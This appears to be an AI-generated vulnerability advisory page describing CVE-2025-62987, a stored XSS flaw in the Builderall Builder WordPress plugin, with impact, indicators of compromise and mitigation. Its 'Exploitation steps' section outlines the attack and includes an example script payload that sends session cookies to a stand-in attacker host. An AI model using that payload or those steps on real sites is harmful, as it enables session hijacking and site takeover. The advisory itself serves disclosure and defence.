CVE-2025-62987
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-62987 is a Stored Cross-Site Scripting (XSS) vulnerability in the Builderall Builder for WordPress plugin (builderall-cheetah-for-wp). It affects all versions up to and including 3.0.1, with no official patch available at the time of disclosure. The vulnerability was reported by Muhammad Yudha - DJ on September 23, 2025, and published by Patchstack on October 23, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically the Stored XSS variant. Exploitation requires a low-privileged authenticated user (Contributor or Developer role) to inject malicious scripts into content managed by the plugin, which are then persistently stored and executed in victims' browsers when they visit affected pages. User interaction by a privileged user is required for the payload to trigger, and the scope is changed, meaning the injected script can affect resources beyond the vulnerable component (Patchstack).

Impact

Successful exploitation allows an attacker with Contributor or Developer-level access to inject persistent malicious scripts (e.g., redirects, advertisements, credential-harvesting payloads) into WordPress pages built with the Builderall plugin. These scripts execute in the browsers of any visitor — including administrators — potentially enabling session hijacking, privilege escalation, or further site compromise. The confidentiality, integrity, and availability impacts are each rated Low, but the changed scope means the attack can affect end users beyond the WordPress installation itself (Patchstack).

Exploitability

No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for CVE-2025-62987. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. Patchstack rates the priority as Low and notes the issue is unlikely to be exploited, though it acknowledges that XSS vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress plugins at scale. There is no CISA KEV catalog entry for this CVE (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Builderall Builder for WordPress plugin version ≤ 3.0.1 using tools like WPScan or by inspecting plugin directories.
  2. Obtain low-privileged access: Register or obtain credentials for a Contributor or Developer account on the target WordPress site.
  3. Inject malicious payload: Using the Builderall Builder interface, insert a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a plugin-managed content field that lacks proper output sanitization.
  4. Persist the payload: Save or publish the content so the malicious script is stored in the WordPress database.
  5. Trigger execution: Wait for a privileged user (e.g., administrator) or site visitor to load the affected page, causing the stored script to execute in their browser and potentially exfiltrating session cookies or performing actions on their behalf (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to plugin-related admin endpoints (e.g., /wp-admin/admin-ajax.php or Builderall builder save endpoints) from low-privileged user accounts containing script tags or encoded JavaScript payloads.
  • Database: Unexpected <script> tags or JavaScript URIs stored in WordPress post meta or options tables associated with Builderall builder content fields.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after loading pages built with the Builderall plugin, potentially indicating cookie or credential exfiltration.
  • File System: No direct file system artifacts expected for stored XSS, but review WordPress database exports for injected script content in builder-related tables.

Mitigation and workarounds

As of the time of disclosure, no official patched version of the Builderall Builder for WordPress plugin has been released. Site administrators should consider deactivating and removing the plugin until a fix is available. Access controls should be reviewed to limit Contributor and Developer role assignments to trusted users only. Patchstack users can leverage virtual patching (RapidMitigate) as an interim mitigation (Patchstack).

Community reactions

Wordfence included this vulnerability in its weekly WordPress vulnerability report for the period of October 20–26, 2025, providing broader community visibility (Wordfence Blog). No significant vendor statements, notable researcher commentary, or major media coverage beyond standard vulnerability aggregation has been observed for this CVE.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-16955NONEN/A
  • ai-engine
NoYesAug 08, 2026
CVE-2026-16953NONEN/A
  • ai-engine
NoYesAug 08, 2026
CVE-2026-16948NONEN/A
  • solace-extra
NoYesAug 08, 2026
CVE-2026-16608NONEN/A
  • download-monitor
NoYesAug 08, 2026
CVE-2026-16595NONEN/A
  • wpdirectorykit
NoYesAug 08, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management